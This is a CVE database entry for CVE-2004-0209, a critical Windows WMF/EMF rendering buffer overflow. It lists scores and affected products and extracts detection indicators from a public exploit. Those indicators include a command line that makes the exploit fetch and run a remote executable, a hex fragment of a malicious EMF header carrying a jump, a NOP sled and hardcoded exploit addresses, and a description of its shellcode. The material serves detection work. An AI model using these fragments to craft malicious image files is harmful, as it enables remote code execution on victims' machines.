cbcvebase.
CVE-2004-0209
published 2004-11-03

CVE-2004-0209: Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to…

PriorityP259critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
62.05%
99.1th percentile
Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer."

Affected

1 ranges
VendorProductVersion rangeFixed in
microsoftwindows_2003_server

Detection & IOCsextracted from sources · hover to see the quote

filenameexpl.emf
filenameHOD-ms04032-emf-expl.c
commandHOD-ms04032-emf-expl.exe expl.emf 2 http://host/file.exe
processiexplore.exe
processexplorer.exe
bytes
\x01\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4c\x03\x00\x00\x4c\x03\x00\x00\x20\x45\x4d\x46\x00\x00\x01\x00\x40\x00\x00\x00\x0b\x00\x00\x00\x0a\x00\x00\x00\xff\xff\x00\x00\xEB\x12\x90\x90\x90\x90\x90\x90\x9e\x5c\x05\x78\xb4\x73\xed\x77
  • Malicious EMF files crafted by this exploit contain the magic bytes '20 45 4D 46' (" EMF") at offset 0x28 and begin with a short JMP (0xEB 0x12) followed by NOP sleds immediately after the standard EMF header — scan for NOP sleds or JMP instructions embedded in EMF headers.
  • The exploit uses a fixed SEH overwrite address (0x77ed73b4) targeting Windows XP SP1 and a fixed ROP/call gadget (0x78055c9e) in rpcrt4.dll — these hardcoded addresses in an EMF file are a strong indicator of exploitation.
  • The portbind shellcode payload opens a listener on a user-specified port (XOR-encoded with 0x8888); monitor for unexpected listening ports spawned by iexplore.exe or explorer.exe after rendering an EMF/WMF file.
  • The download-and-execute shellcode variant fetches and runs a remote executable via URL passed as a command-line argument; monitor for iexplore.exe or explorer.exe spawning child processes or making unexpected outbound HTTP connections after EMF rendering.
  • The exploit targets the Graphics Rendering Engine (GRE) via malformed WMF or EMF image formats containing an unchecked buffer — alert on anomalous EMF/WMF files processed by explorer.exe or iexplore.exe, especially those with executable code in the header region.
  • ·The hardcoded SEH and ROP gadget addresses are specific to Windows XP SP1; the exploit as published does not support Windows 2000 or Windows Server 2003 without modification.
  • ·The exploit was tested only against Internet Explorer 6.0 SP1 and Explorer (shell); other applications that render EMF/WMF may also be vulnerable but are not covered by this proof-of-concept.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.